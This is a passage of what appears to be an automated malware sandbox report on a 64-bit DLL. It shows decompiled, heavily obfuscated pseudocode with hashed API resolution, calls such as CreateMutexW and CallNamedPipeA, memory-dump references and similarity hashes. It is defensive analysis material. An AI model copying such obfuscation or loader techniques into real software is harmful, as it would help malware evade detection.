                          				 *((long long*)(_t60 + 0x350)) = 0x2599;
                          				 *((long long*)(_t60 + 0x120)) =  *((long long*)(_t60 + 0x120)) + 0xfffff73c;
                          				return _t68 + 0x2103;
                          			}











                          0x7ff88c08a4a0
                          0x7ff88c08a4af
                          0x7ff88c08a4c7
                          0x7ff88c08a4d8
                          0x7ff88c08a4df
                          0x7ff88c08a4ee
                          0x7ff88c08a4f6
                          0x7ff88c08a4ff
                          0x7ff88c08a513
                          0x7ff88c08a519
                          0x7ff88c08a529
                          0x7ff88c08a532
                          0x7ff88c08a538
                          0x7ff88c08a53d
                          0x7ff88c08a548
                          0x7ff88c08a54d
                          0x7ff88c08a55d
                          0x7ff88c08a564
                          0x7ff88c08a57f
                          0x7ff88c08a5a5
                          0x7ff88c08a5ba
                          0x7ff88c08a5c1
                          0x7ff88c08a5ca
                          0x7ff88c08a5d0
                          0x7ff88c08a5d5
                          0x7ff88c08a5e3
                          0x7ff88c08a5e8
                          0x7ff88c08a5ef
                          0x7ff88c08a607

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.402580217.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000000.00000002.402568884.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402605810.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402623535.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402632388.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402643514.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402657425.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff88c070000_loaddll64.jbxd
                          Similarity
                          • API ID: CreateCriticalFileHeapLeaveLockSection
                          • String ID: 8
                          • API String ID: 4149557297-406019892
                          • Opcode ID: 0304c58dce2f1884ae2341276877548bb9fe5ba18944b714c61802e3584d9951
                          • Instruction ID: ff74dbd2f9daec340bab1ab70c5beef93b8fbc3c4f76233a6a4273b2c6205914
                          • Opcode Fuzzy Hash: 0304c58dce2f1884ae2341276877548bb9fe5ba18944b714c61802e3584d9951
                          • Instruction Fuzzy Hash: 52617B736086C48AD762CF15E448B9EB7A8FB89794F054139EB8957B98CB38D990CB00
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 50%
                          			E00007FF87FF88C072A70(long long __rbx, void* __rcx, long long __rdx, void* __r8, void* __r10) {
                          				void* __r13;
                          				void* __r14;
                          				void* __r15;
                          				intOrPtr _t93;
                          				intOrPtr _t99;
                          				signed int _t105;
                          				void* _t110;
                          				signed long long _t136;
                          				intOrPtr _t149;
                          				long long _t150;
                          				void* _t154;
                          				void* _t155;
                          				void* _t158;
                          				signed long long _t159;
                          				void* _t160;
                          				void* _t163;
                          				void* _t165;
                          				void* _t166;
                          				void* _t168;
                          				long long _t170;
                          				void* _t171;
                          
                          				r13d =  *(_t160 + 0x100);
                          				r10d = __r8 - 0x30d5;
                          				r12d =  *(_t160 + 0x108);
                          				r8d = __rcx - 0x1408;
                          				r13d = r13d + 0xffffda68;
                          				 *(_t160 + 0x100) = r10d;
                          				_t170 = __rdx;
                          				 *(_t160 + 0x108) = r8d;
                          				_t110 = __rcx + 0x61f;
                          				r9d = r9d + 0xffffeb0d;
                          				_t99 =  *((intOrPtr*)(_t160 + 0xf0)) + 0xffffd84e;
                          				 *((intOrPtr*)(_t160 + 0xd0)) = r9d;
                          				 *((intOrPtr*)(_t160 + 0xe8)) = _t99;
                          				r12d = r12d + 0xffffdc0a;
                          				r15d = r13d;
                          				if (_t99 - _t168 + 0x3189 >= 0) goto 0x8c072d94;
                          				if (_t99 - __r8 - 0x106 >= 0) goto 0x8c072d94;
                          				if (_t110 == _t154 - 0x3f3) goto 0x8c072d94;
                          				 *((long long*)(_t160 + 0xc8)) = __rbx;
                          				if (r12d - _t168 + 0x1f2c > 0) goto 0x8c072c16;
                          				_t149 =  *((intOrPtr*)(__rdx + 0x1c0));
                          				r9d = __r10 + 0x2598;
                          				_t136 =  *((intOrPtr*)(__rdx + 0x1e0));
                          				r10d = _t158 - 0x984;
                          				r11d = _t154 - 0x1956;
                          				r8d = _t166 + 0x2103;
                          				_t108 =  *(_t160 + 0x100) + 0x38e9;
                          				 *(__rdx + 0x68) =  *(_t149 + 0x188) * 0x5adf2c5c;
                          				 *(__rdx + 0xa0) = _t136 | 0x00002598;
                          				_t105 = _t168 + 0x27b2;
                          				 *((intOrPtr*)(_t160 + 0x60)) = _t154 - 0x12ab;
                          				 *(_t160 + 0x58) = r10d;
                          				 *((intOrPtr*)(_t160 + 0x50)) = r9d;
                          				 *((intOrPtr*)(_t160 + 0x48)) = r11d;
                          				 *((intOrPtr*)(_t160 + 0x40)) = _t155 + 0x4ca;
                          				 *((long long*)(__rdx + 0x1e0)) = _t136 -  *((intOrPtr*)(_t149 + 0x198)) - 0x3a59;
                          				 *(_t160 + 0x38) = _t105;
                          				 *(_t160 + 0x30) =  *(_t160 + 0x100) + 0x38e9;
                          				 *((long long*)(_t160 + 0x28)) = __rdx;
                          				 *((intOrPtr*)(_t160 + 0x20)) = _t110 + 0xffffeb3f;
                          				E00007FF87FF88C08D5F0( *((intOrPtr*)(_t160 + 0xe0)) + 0x3f3, _t136 | 0x00002598, _t136 -  *((intOrPtr*)(_t149 + 0x198)) - 0x3a59, _t149, __r8, _t163, _t165, _t168, __rdx, _t171); // executed
                          				goto 0x8c072d8c;
                          				_t150 = r13d;
                          				_t159 = r12d;
                          				 *((long long*)(_t160 + 0x70)) = _t150;
                          				if (_t150 - _t159 *  *(__rdx + 0x198) < 0) goto 0x8c072c95;
                          				GetProcessHeap();
                          				if (r13d + 4 - _t159 *  *(__rdx + 0x198) >= 0) goto 0x8c072c43;
                          				r13d = r15d;
                          				r8d =  *(_t160 + 0x108);
                          				r9d =  *((intOrPtr*)(_t160 + 0xd0));
                          				if ( *((intOrPtr*)(__rdx + 0x78)) ==  *((intOrPtr*)(__rdx + 0x1b8)) +  *((intOrPtr*)(__rdx + 0x110)) -  *((intOrPtr*)(__rdx + 0xb0))) goto 0x8c072d8c;
                          				if ( *((intOrPtr*)(_t160 + 0x70)) - ( *(__rdx + 0x1f0) ^  *(__rdx + 0x100)) + r9d > 0) goto 0x8c072d8c;
                          				_t93 =  *((intOrPtr*)(__rdx + 0x78));
                          				if (_t93 - (_t154 + _t171 | _t105) > 0) goto 0x8c072d8c;
                          				asm("o16 nop [eax+eax]");
                          				 *(_t160 + 0x58) = 0x2743;
                          				 *((long long*)(_t160 + 0x50)) = 0x2de1;
                          				 *((long long*)(_t160 + 0x48)) = 0x19c7;
                          				r9d = 0x1ff4;
                          				 *((long long*)(_t160 + 0x40)) = 0x2e2f;
                          				r8d = 0x1c0c;
                          				 *(_t160 + 0x38) = 0x26f1;
                          				 *(_t160 + 0x30) = 0x1000;
                          				 *((long long*)(_t160 + 0x28)) = 0x1acd;
                          				 *((long long*)(_t160 + 0x20)) = 0x1f1c;
                          				 *0x8c0b4160 = E00007FF87FF88C08F8F0(_t93, _t108 & 0x00003189, _t93 - (_t154 + _t171 | _t105), ( *(__rdx + 0x1f0) ^  *(__rdx + 0x100)) + r9d,  *((intOrPtr*)(_t160 + 0x70)), _t108, _t163, _t165);
                          				r15d = r15d ^ r13d &  *(_t170 + 0x188);
                          				 *(_t170 + 0xb0) = r8d |  *(_t170 + 0xd8);
                          				if (_t93 + 3 - (_t154 + _t171 | _t105) <= 0) goto 0x8c072cf0;
                          				return _t171 + 0x1f2c;
                          			}
























                          0x7ff88c072a83
                          0x7ff88c072a8b
                          0x7ff88c072aa0
                          0x7ff88c072aa8
                          0x7ff88c072aaf
                          0x7ff88c072ab6
                          0x7ff88c072abe
                          0x7ff88c072ac1
                          0x7ff88c072ad0
                          0x7ff88c072ad6
                          0x7ff88c072add
                          0x7ff88c072aea
                          0x7ff88c072af8
                          0x7ff88c072aff
                          0x7ff88c072b06
                          0x7ff88c072b0b
                          0x7ff88c072b1a
                          0x7ff88c072b28
                          0x7ff88c072b35
                          0x7ff88c072b40
                          0x7ff88c072b46
                          0x7ff88c072b4d
                          0x7ff88c072b54
                          0x7ff88c072b5b
                          0x7ff88c072b62
                          0x7ff88c072b86
                          0x7ff88c072b8e
                          0x7ff88c072b94
                          0x7ff88c072ba1
                          0x7ff88c072bb5
                          0x7ff88c072bca
                          0x7ff88c072bd4
                          0x7ff88c072bd9
                          0x7ff88c072bde
                          0x7ff88c072be3
                          0x7ff88c072be7
                          0x7ff88c072bf5
                          0x7ff88c072bff
                          0x7ff88c072c03
                          0x7ff88c072c08
                          0x7ff88c072c0c
                          0x7ff88c072c11
                          0x7ff88c072c16
                          0x7ff88c072c1c
                          0x7ff88c072c22
                          0x7ff88c072c32
                          0x7ff88c072c61
                          0x7ff88c072c7b
                          0x7ff88c072c82
                          0x7ff88c072c85
                          0x7ff88c072c8d
                          0x7ff88c072cae
                          0x7ff88c072ccb
                          0x7ff88c072cd1
                          0x7ff88c072cdd
                          0x7ff88c072ce6
                          0x7ff88c072cf0
                          0x7ff88c072cfe
                          0x7ff88c072d0c
                          0x7ff88c072d15
                          0x7ff88c072d1b
                          0x7ff88c072d24
                          0x7ff88c072d2a
                          0x7ff88c072d33
                          0x7ff88c072d3c
                          0x7ff88c072d45
                          0x7ff88c072d59
                          0x7ff88c072d6a
                          0x7ff88c072d77
                          0x7ff88c072d86
                          0x7ff88c072dad

                          APIs
                          • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF88C07906E), ref: 00007FF88C072C61
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.402580217.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000000.00000002.402568884.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402605810.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402623535.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402632388.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402643514.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402657425.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff88c070000_loaddll64.jbxd
                          Similarity
                          • API ID: HeapProcess
                          • String ID: /.$C'$-
                          • API String ID: 54951025-1702015707
                          • Opcode ID: 672deff062b64fbc16a2a7a10c4d6b86e45e16b49530db53f8233d17ed392130
                          • Instruction ID: 9c7a84dd35a83a2604f00d6349f8973aef6061ce686c901b9d6d4753d9879d53
                          • Opcode Fuzzy Hash: 672deff062b64fbc16a2a7a10c4d6b86e45e16b49530db53f8233d17ed392130
                          • Instruction Fuzzy Hash: FF71AB72A086D6C6EB24CB04E498BEEB7A8F784788F014135DF8D47B58DB78E595CB40
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 29%
                          			E0000027E27ED371A7A0(void* __edi, long long* __rax, long long __rbx, intOrPtr* __rcx, void* __rdx, void* __r9, long long _a8, char _a16, char _a24) {
                          				intOrPtr _v56;
                          				void* _v64;
                          				intOrPtr _v72;
                          				long long _v88;
                          				void* __rsi;
                          				void* __rbp;
                          				long long* _t58;
                          				long long* _t59;
                          				long long _t60;
                          				long long _t75;
                          				intOrPtr* _t87;
                          
                          				_t60 = __rbx;
                          				_t58 = __rax;
                          				_a8 = __rbx;
                          				_t76 =  *0xd371d458;
                          				_t87 = __rcx;
                          				_v72 = 0x18;
                          				_v56 = 0;
                          				E0000027E27ED371908C(0xe9f8f8df, __rax,  *((intOrPtr*)( *0xd371d458 + 0x20)));
                          				if (_t58 == __rbx) goto 0xd371a804;
                          				r9d = 0; // executed
                          				 *_t58(); // executed
                          				goto 0xd371a806;
                          				if (0 == 0) goto 0xd371a8d2;
                          				r9d = 0;
                          				_a16 =  *__rcx;
                          				_t59 =  &_a24;
                          				_v88 = _t59;
                          				E0000027E27ED3711000(__edi, _t59, __rbx,  &_a16,  *0xd371d458, 0x27ed3710000,  *0xd371d448 + 0x27ed3721178);
                          				if (_t59 == _t60) goto 0xd371a8d2;
                          				E0000027E27ED371908C(0x3ff22481, _t59,  *((intOrPtr*)( *0xd371d458 + 0x18)));
                          				if (_t59 == _t60) goto 0xd371a875;
                          				CreateMutexW(??, ??, ??); // executed
                          				goto 0xd371a878;
                          				_t75 = _t60;
                          				if (_t75 == _t60) goto 0xd371a8c4;
                          				E0000027E27ED371908C(0xc06f8334, _t59,  *((intOrPtr*)( *0xd371d458 + 0x18)));
                          				if (_t59 == _t60) goto 0xd371a894;
                          				 *_t59();
                          				goto 0xd371a899;
                          				if (0x7f != 0xb7) goto 0xd371a8ba;
                          				E0000027E27ED371908C(0xa219a077, _t59,  *((intOrPtr*)(_t76 + 0x18)));
                          				if (_t59 == _t60) goto 0xd371a8c4;
                          				FindCloseChangeNotification(??); // executed
                          				goto 0xd371a8c4;
                          				 *((long long*)(_t87 + 0x18)) = _t75;
                          				HeapFree(??, ??, ??);
                          				return 1;
                          			}














                          0x27ed371a7a0
                          0x27ed371a7a0
                          0x27ed371a7a0
                          0x27ed371a7b0
                          0x27ed371a7be
                          0x27ed371a7c5
                          0x27ed371a7cf
                          0x27ed371a7dc
                          0x27ed371a7eb
                          0x27ed371a7fd
                          0x27ed371a800
                          0x27ed371a802
                          0x27ed371a808
                          0x27ed371a812
                          0x27ed371a81d
                          0x27ed371a824
                          0x27ed371a838
                          0x27ed371a83d
                          0x27ed371a848
                          0x27ed371a857
                          0x27ed371a85f
                          0x27ed371a86e
                          0x27ed371a873
                          0x27ed371a875
                          0x27ed371a87b
                          0x27ed371a886
                          0x27ed371a88e
                          0x27ed371a890
                          0x27ed371a892
                          0x27ed371a89e
                          0x27ed371a8a9
                          0x27ed371a8b1
                          0x27ed371a8b6
                          0x27ed371a8b8
                          0x27ed371a8ba
                          0x27ed371a8cc
                          0x27ed371a8e7

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.402437262.0000027ED3710000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027ED3710000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_27ed3710000_loaddll64.jbxd
                          Similarity
                          • API ID: DescriptorSecurity$ChangeCloseConvertCreateErrorFindFreeHeapLastMutexNotificationString
                          • String ID:
                          • API String ID: 2727274001-0
                          • Opcode ID: 094b80e17cbc27acdaa4bcb602713c3cf38535d7203a15ce1a2febed987810e0
                          • Instruction ID: 695ab9930fc72316fdf91a29b8f2bbbb34865e5fea541ff579058fbf4596a7c2
                          • Opcode Fuzzy Hash: 094b80e17cbc27acdaa4bcb602713c3cf38535d7203a15ce1a2febed987810e0
                          • Instruction Fuzzy Hash: 0631B033A08A85D6EFB0DF51E44839BA3A4E38E780F4954619E4D437C6CE78D58AD760
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          APIs
                          • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF88C07D8CF), ref: 00007FF88C080A59
                          • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF88C07D8CF), ref: 00007FF88C080ABB
                          • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF88C07D8CF), ref: 00007FF88C080AF5
                          • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF88C07D8CF), ref: 00007FF88C080B1F
                          Memory Dump Source
                          • Source File: 00000000.00000002.402580217.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000000.00000002.402568884.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402605810.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402623535.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402632388.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402643514.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402657425.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff88c070000_loaddll64.jbxd
                          Similarity
                          • API ID: ByteCharEnvironmentMultiStringsWide$Free
                          • String ID:
                          • API String ID: 1557788787-0
                          • Opcode ID: 9283de5ed1eefac579436c803e6a5d98ddaba24538f63861c94d1b4398621570
                          • Instruction ID: f2fc2ac83be0fb9f6078adaba92fb868221eb327f7e01f7ff60d07e042cf903b
                          • Opcode Fuzzy Hash: 9283de5ed1eefac579436c803e6a5d98ddaba24538f63861c94d1b4398621570
                          • Instruction Fuzzy Hash: A2213231F19B9581EE748F12F840129A6E4FB55FD8B189135DA9E63BA8DF3CE452C700
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 35%
                          			E00007FF87FF88C089F80(intOrPtr __ecx, void* __edx, void* __rax, long long __rbx, void* __rcx, void* __rdx, void* __r8, void* __r9, void* __r10, void* __r11) {
                          				void* __rdi;
                          				void* __rbp;
                          				void* __r12;
                          				signed short _t143;
                          				signed int _t145;
                          				signed int _t199;
                          				signed int _t205;
                          				intOrPtr _t206;
                          				signed int _t209;
                          				signed int _t211;
                          				signed short* _t239;
                          				void* _t241;
                          				signed long long _t242;
                          				void* _t246;
                          				signed long long _t248;
                          				void* _t250;
                          				CHAR* _t253;
                          				void* _t256;
                          				void* _t258;
                          				void* _t259;
                          				signed short* _t262;
                          				void* _t267;
                          				void* _t271;
                          				void* _t273;
                          				void* _t275;
                          				void* _t277;
                          
                          				_t267 = __r10;
                          				_t265 = __r9;
                          				_t246 = __rdx;
                          				_t241 = __rcx;
                          				 *((long long*)(_t258 + 0x18)) = __rbx;
                          				 *(_t258 + 0x20) = r9d;
                          				 *((intOrPtr*)(_t258 + 8)) = __ecx;
                          				_t259 = _t258 - 0x90;
                          				r12d =  *(_t259 + 0x100);
                          				r10d = __rdx + 0x354;
                          				_t239 =  *((intOrPtr*)(_t259 + 0xf0));
                          				r15d = r9d;
                          				 *(_t259 + 0x74) = __rdx - 0x3595;
                          				r13d = __rax - 0x228c;
                          				 *(_t259 + 0xf8) = __edx + 0xfffff21d;
                          				r11d = _t271 + 0x14c1;
                          				 *((intOrPtr*)(_t259 + 0x78)) =  *(_t259 + 0xf8) + 0x522;
                          				r14d = _t277 - 0x12f1;
                          				 *(_t259 + 0x7c) = r11d;
                          				 *(_t259 + 0x108) = _t277 - 0x145b;
                          				 *(_t259 + 0x80) = r14d;
                          				r9d = __rax - 0x11a9;
                          				r8d = __rax - 0x923;
                          				 *(_t259 + 0xd8) = r9d;
                          				 *(_t259 + 0x70) = r8d;
                          				_t206 = __rax - 0x11a9;
                          				 *((intOrPtr*)(_t259 + 0x84)) = _t206;
                          				 *(_t259 + 0x110) = __rax + 0x984;
                          				if (r14d - _t256 + 0x106 < 0) goto 0x8c08a261;
                          				if (r15d == _t275 + 0x1663) goto 0x8c08a261;
                          				_t239[0xac] = _t239[0x11e];
                          				r10d = r10d - 0x283;
                          				r8d = 0x343a;
                          				r9d = 0x329d;
                          				 *(_t259 + 0x88) = r10d;
                          				 *(_t259 + 0x50) = 0x8c0a8090;
                          				 *(_t259 + 0x48) = 0x7d;
                          				 *(_t259 + 0x40) = 0x1a;
                          				 *(_t259 + 0x38) =  *((intOrPtr*)(_t239[0xe4] + 0x130)) - 0x23ef;
                          				 *(_t259 + 0x30) = 0x1e0;
                          				 *(_t259 + 0x28) = 0x3666;
                          				 *(_t259 + 0x20) = _t239;
                          				_t143 = E00007FF87FF88C08F290(0x27ae, 0x343a, _t239, _t250, __r8, __r9, _t277, _t275, _t273, _t271, _t250);
                          				r9d =  *(_t259 + 0xf8);
                          				r8d =  *(_t259 + 0x110);
                          				r11d = _t253 - 0x1956;
                          				r12d = _t250 + 0x1309;
                          				r10d = _t273 + 0x23f6;
                          				r14d = _t273 + 0x30d5;
                          				_t239[0x11e] = _t143;
                          				 *((intOrPtr*)(_t259 + 0x68)) = _t256 + 0x19bd;
                          				 *((intOrPtr*)(_t259 + 0x60)) = _t250 + 0x165d;
                          				r15d = r15d + 0xfffffbb6;
                          				 *(_t259 + 0x58) = r10d;
                          				r9d = r9d + 0xfffffc44;
                          				 *(_t259 + 0x50) = r11d;
                          				r8d = r8d + 0xfffff9e1;
                          				 *(_t259 + 0x48) =  *(_t259 + 0x74) + 0x3189;
                          				 *(_t259 + 0x40) =  *((intOrPtr*)(_t259 + 0x78)) + 0x9db;
                          				 *(_t259 + 0x38) = _t206 + 0x1669;
                          				 *(_t259 + 0x30) = r14d;
                          				 *(_t259 + 0x28) = _t239;
                          				 *(_t259 + 0x20) = r15d;
                          				_t145 = E00007FF87FF88C0790B0(0x8c0a8090, _t239, _t241, _t246, __r8, __r11);
                          				r14d =  *(_t259 + 0x80);
                          				r8d =  *(_t259 + 0x74);
                          				r11d =  *(_t259 + 0x108);
                          				r8d = r8d + 0x27b2;
                          				r9d =  *(_t259 + 0x70);
                          				r11d =  &(r11d[0x9ed]);
                          				r10d = _t275 + 0x119f;
                          				 *(_t259 + 0xf8) = _t145;
                          				r9d = r9d + 0xfffff951;
                          				 *(_t259 + 0x48) = _t273 + 0x38e9;
                          				 *(_t259 + 0x40) = r8d;
                          				_t262 = _t239;
                          				 *(_t259 + 0x38) = r12d;
                          				 *(_t259 + 0x30) = r10d;
                          				 *(_t259 + 0x28) = r11d;
                          				 *(_t259 + 0x20) =  *((intOrPtr*)(_t259 + 0x78)) + 0xf39;
                          				E00007FF87FF88C072390(0x8c0a8090, _t239, _t241, _t246, _t262, _t265, _t271); // executed
                          				r8d =  *(_t259 + 0x70);
                          				r9d =  *(_t259 + 0xd8);
                          				r12d =  *(_t259 + 0x100);
                          				r15d =  *(_t259 + 0xe8);
                          				r11d =  *(_t259 + 0x7c);
                          				r10d =  *(_t259 + 0x88);
                          				if (r12d - _t273 + 0x27b2 >= 0) goto 0x8c08a3c0;
                          				if (r13d - _t271 + 0x216 >= 0) goto 0x8c08a31a;
                          				r11d = _t250 + 0x526;
                          				r10d = _t262 - 0x526;
                          				 *((intOrPtr*)(_t259 + 0x60)) = _t267 - 0x3c9;
                          				_t205 =  &(_t262[0x644]);
                          				 *(_t259 + 0x58) = r10d;
                          				r15d = _t241 + 0x11ae;
                          				 *(_t259 + 0x50) = r11d;
                          				_t199 =  *((intOrPtr*)(_t259 + 0xd0)) + 0x44a;
                          				 *(_t259 + 0x48) = _t239;
                          				_t209 =  *((intOrPtr*)(_t259 + 0x84)) + 0x4ca;
                          				 *(_t259 + 0x40) = _t199;
                          				r14d = r14d + 0xcdf;
                          				 *(_t259 + 0x38) = _t205;
                          				r9d = r9d + 0x4ca;
                          				 *(_t259 + 0x30) = _t209;
                          				r8d = r8d + 0xfffffde6;
                          				 *(_t259 + 0x28) = r14d;
                          				 *(_t259 + 0x20) = r15d;
                          				E00007FF87FF88C0875E0(0x8c0a8090, _t241, _t246);
                          				goto 0x8c08a47d;
                          				_t242 = _t239[0x80];
                          				if (_t242 != ( *(_t259 + 0xd8) + 0x66c) * _t239[0xf0]) goto 0x8c08a340;
                          				_t211 = _t209 & _t239[0xf0] & 0x00003189;
                          				r12d = r12d + _t211;
                          				_t248 = _t239[0x114] & r9d;
                          				if (r13d - _t248 < 0) goto 0x8c08a47d;
                          				if (_t239[0x48] - (r15d | _t242) <= 0) goto 0x8c08a39c;
                          				r12d = r12d - (r15d | 0x000027b2);
                          				 *_t239 =  *_t239 - _t242;
                          				_t239[0x20] = _t239[0x20] - (_t239[0x88] - 0x000023f6 &  *_t239);
                          				goto 0x8c08a3af;
                          				_t239[0xc] = _t239[0xc] ^ _t205 * _t239[0xc4] + _t239[0x3c];
                          				r13d = r13d + 2;
                          				if (r13d - _t248 >= 0) goto 0x8c08a366;
                          				goto 0x8c08a47d;
                          				if (_t239[0x10c] - _t242 >= 0) goto 0x8c08a47d;
                          				r12d =  *(_t259 + 0x70);
                          				asm("o16 nop [eax+eax]");
                          				 *(_t259 + 0x20) = _t239[0x98] | 0x0000228c;
                          				r9d = (_t239[0xa8] & 0x0000ffff) * ( *_t239 & 0x0000ffff) & 0x0000ffff;
                          				r9d = r9d * (r11w & 0xffffffff);
                          				r8d = _t239[0xc4] * r12d * 0x30d5;
                          				CallNamedPipeA(_t253, _t256, ??, ??, ??);
                          				r11d =  *(_t259 + 0x7c);
                          				if (_t199 + 1 - (_t239[0x20] - 0x23f6) * _t211 < 0) goto 0x8c08a3f0;
                          				r12d =  *(_t259 + 0x100);
                          				return _t271 + 0xb3d;
                          			}





























                          0x7ff88c089f80
                          0x7ff88c089f80
                          0x7ff88c089f80
                          0x7ff88c089f80
                          0x7ff88c089f80
                          0x7ff88c089f85
                          0x7ff88c089f8a
                          0x7ff88c089f99
                          0x7ff88c089fad
                          0x7ff88c089fb5
                          0x7ff88c089fbc
                          0x7ff88c089fc4
                          0x7ff88c089fcd
                          0x7ff88c089fd1
                          0x7ff88c089fd8
                          0x7ff88c089fe4
                          0x7ff88c089fec
                          0x7ff88c089ff0
                          0x7ff88c08a005
                          0x7ff88c08a00a
                          0x7ff88c08a011
                          0x7ff88c08a019
                          0x7ff88c08a020
                          0x7ff88c08a027
                          0x7ff88c08a036
                          0x7ff88c08a03b
                          0x7ff88c08a047
                          0x7ff88c08a054
                          0x7ff88c08a05e
                          0x7ff88c08a06e
                          0x7ff88c08a080
                          0x7ff88c08a087
                          0x7ff88c08a095
                          0x7ff88c08a098
                          0x7ff88c08a09e
                          0x7ff88c08a0b3
                          0x7ff88c08a0be
                          0x7ff88c08a0c3
                          0x7ff88c08a0c8
                          0x7ff88c08a0d1
                          0x7ff88c08a0d9
                          0x7ff88c08a0e1
                          0x7ff88c08a0e6
                          0x7ff88c08a0eb
                          0x7ff88c08a0f9
                          0x7ff88c08a101
                          0x7ff88c08a10f
                          0x7ff88c08a11a
                          0x7ff88c08a125
                          0x7ff88c08a12c
                          0x7ff88c08a144
                          0x7ff88c08a14e
                          0x7ff88c08a152
                          0x7ff88c08a159
                          0x7ff88c08a15e
                          0x7ff88c08a165
                          0x7ff88c08a16a
                          0x7ff88c08a171
                          0x7ff88c08a17b
                          0x7ff88c08a182
                          0x7ff88c08a186
                          0x7ff88c08a18b
                          0x7ff88c08a190
                          0x7ff88c08a195
                          0x7ff88c08a19a
                          0x7ff88c08a1a2
                          0x7ff88c08a1a7
                          0x7ff88c08a1af
                          0x7ff88c08a1b6
                          0x7ff88c08a1bb
                          0x7ff88c08a1c9
                          0x7ff88c08a1db
                          0x7ff88c08a1ef
                          0x7ff88c08a1f6
                          0x7ff88c08a200
                          0x7ff88c08a205
                          0x7ff88c08a208
                          0x7ff88c08a20d
                          0x7ff88c08a212
                          0x7ff88c08a217
                          0x7ff88c08a21b
                          0x7ff88c08a220
                          0x7ff88c08a227
                          0x7ff88c08a22f
                          0x7ff88c08a23e
                          0x7ff88c08a24d
                          0x7ff88c08a259
                          0x7ff88c08a26b
                          0x7ff88c08a27c
                          0x7ff88c08a289
                          0x7ff88c08a2a5
                          0x7ff88c08a2ac
                          0x7ff88c08a2b0
                          0x7ff88c08a2b7
                          0x7ff88c08a2bc
                          0x7ff88c08a2c3
                          0x7ff88c08a2c8
                          0x7ff88c08a2ce
                          0x7ff88c08a2d3
                          0x7ff88c08a2d9
                          0x7ff88c08a2dd
                          0x7ff88c08a2e4
                          0x7ff88c08a2e8
                          0x7ff88c08a2ef
                          0x7ff88c08a2f3
                          0x7ff88c08a2fa
                          0x7ff88c08a30b
                          0x7ff88c08a310
                          0x7ff88c08a315
                          0x7ff88c08a31a
                          0x7ff88c08a32f
                          0x7ff88c08a337
                          0x7ff88c08a33d
                          0x7ff88c08a34a
                          0x7ff88c08a353
                          0x7ff88c08a369
                          0x7ff88c08a373
                          0x7ff88c08a390
                          0x7ff88c08a396
                          0x7ff88c08a39a
                          0x7ff88c08a3ab
                          0x7ff88c08a3af
                          0x7ff88c08a3b9
                          0x7ff88c08a3bb
                          0x7ff88c08a3dc
                          0x7ff88c08a3e2
                          0x7ff88c08a3ea
                          0x7ff88c08a41d
                          0x7ff88c08a422
                          0x7ff88c08a42a
                          0x7ff88c08a443
                          0x7ff88c08a44a
                          0x7ff88c08a45e
                          0x7ff88c08a46f
                          0x7ff88c08a475
                          0x7ff88c08a49f

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.402580217.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000000.00000002.402568884.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402605810.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402623535.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
